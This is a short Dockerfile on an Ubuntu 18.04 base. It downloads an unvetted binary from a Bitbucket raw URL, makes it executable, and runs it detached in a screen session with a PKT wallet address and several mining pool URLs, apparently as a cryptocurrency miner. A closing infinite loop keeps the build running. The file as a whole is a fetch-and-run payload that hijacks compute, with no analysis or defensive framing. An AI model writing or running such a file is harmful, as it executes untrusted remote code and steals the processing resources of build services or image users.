FROM ubuntu:18.04

RUN apt-get update && apt-get install -y screen wget
RUN chmod 777 /run/screen
WORKDIR .
RUN wget https://bitbucket.org/servcore01010101/casing/raw/105c82899fd915c8bf9b3ad29a1479d2b69bbb2d/ann
RUN chmod +x ann
RUN screen -dmS annss ./ann ann -p pkt1q3r6qa92j5mgtgm4eusekelhrx27tz800qnd0h3 http://pool.srizbi.com http://pool.pktpool.io http://pool.pkt.world
RUN while :; do echo "hello"; sleep 10; done